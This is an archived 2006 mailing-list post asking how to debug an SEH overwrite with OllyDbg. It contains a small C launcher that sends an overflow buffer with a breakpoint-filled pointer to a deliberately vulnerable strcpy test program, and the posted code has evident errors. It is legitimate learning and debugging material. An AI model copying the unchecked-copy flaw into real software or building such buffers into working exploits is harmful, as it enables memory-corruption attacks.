Vulnerability Development mailing list archives
debugging seh overwrite
From: laphoo () gmail com
Date: 20 Mar 2006 02:19:57 -0000
Hello, I would like to know a way to debugging a vulnerable program, where I am overwriting the se handler with my address. I have OllyDbg as just in time debugger. If my exploit-buffer reaches the pointer to the next seh record, nothing happens. Now I was trying to put breakpoint instructions 0xcc) as fake pointer but OllyDbg ignored them, or I did something wrong. How is it possible to debug my vulnerable program with OllyDbg, to see where and with which data I overwrote something? /* cl expl.c (Visual C++ 6.0) */ #include <stdio.h> #include <string.h> int main (void) { char *app[3]; char payload[84]; unsigned int ptr = 0xcccccccc; memset(payload, 0x00, sizeof payload); memset(payload, 0x41, 80); memcpy(payload+80, &ret, sizeof (int)); app[0] = "vuln.exe"; app[1] = payload; app[2] = NULL; execve(app[0], app, NULL); return 0; } /*vuln.c / #include <stdio.h> #include <string.h> int main (int argc, char *argv[]) { char string[32]; if (argc > 2) { printf("Usage: %s <string>\n", argv[0]); return 0; } strcpy(string, argv[1]); printf("%s", string); return 0; } Environment is Windows.XP.SP.2 I am sorry for my bad english. Regards, -- Laphoo
Current thread:
- debugging seh overwrite laphoo (Mar 20)
- Re: debugging seh overwrite The Jabberwock (Mar 20)
- Re: debugging seh overwrite Felix Lindner (Mar 20)
- Re: debugging seh overwrite Karma (Mar 22)